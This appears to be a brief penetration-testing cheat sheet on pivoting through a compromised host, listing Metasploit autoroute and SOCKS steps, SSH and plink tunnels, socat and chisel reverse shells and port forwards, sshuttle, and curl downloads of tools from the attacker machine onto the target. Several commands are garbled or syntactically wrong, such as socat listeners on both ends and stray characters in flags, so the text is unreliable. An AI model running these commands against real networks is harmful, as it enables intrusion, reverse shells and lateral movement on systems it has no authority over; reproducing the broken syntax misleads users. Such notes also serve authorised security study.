Pivoting

1- Metasploit: -

After exploiting one machine and get the meterpreter for it run the following commands:-

1- Run autoroute -r target_ip_network

2- Run post/windows/arp_scanner target_ip_networkà to see the reachable active hosts.

3- Use /auxiliary/server/socks à to open proxy channel.

4- Then use proxychains in the attacking machine to run commends like nmap.

2- Without Metasploit: -

There are various tools for that:-

· SSH Tunneling and Port forward:-

1- Forward connection- run the following commands on the attacking machine:-

A- Ssh -L LOCAL_PORT:DESTINATION_IP:DESTINATION_PORT USER@SSH_SERVER -FN

2- Create a proxy using ssh — run the following commands on the attacking machine:-

A- Ssh -D #PORT USER@SSH_SERVER -FN

· Plink.exe (it’s for windows because doesn’t have ssh server):-

1- Sudo apt install putty_tools

2- Cmd /c .y| ./plink.exe -R LOCAL_PORT:DESTINATION_IP:DESTINATION_PORT USER@IP -i KEYFILE -N

3- Puttygen KEYFILE -O FILE.ppk

· Socat

1- Reverse shell:-

A- On attacking à nc -nlvp port

B- On targetà./socat tcp-l: LOCAL_PORT tcp-l:attacking_ip:port

2- Port forward:-

A- On attacking à ./socat tcp-l:port tcp-l:port fork, reuseaddr

B- On targetà./socat tcp:attacking_ip:port tcp:target_ip:port, fork

· Chisel (it’s for windows and linux):

1- Reverse shell:-

A- On attackingà ./chisel server -p PORT — -reverse

B- On targetà ./chisel client attacking_ip:port R:socks

2- Forward shell proxy:-

A- On attackingà ./chisel server -p PORT — -socks5

B- On target à ./chisel client target_ip:attacking_port proxy_port:socks

· Shuttle

1- Sshuttle -r USER@IP_SERVER SUBNET -x IP_SERVER

2- — -sh-cmd “ssh -i priv-key”

Use wget URL -q à to download a file

To transefer a file from attacking to target machine:

A1- scp -i KEY chisel user@target:/tmp/chisel-USERNAME

B1-On the attackingà sudo python3 -m http.server 80

B2- On the target à curl ATTACKING_IP/socat -o /tmp/socat-USERNAME && chmod +x /tmp/socat-USERNAME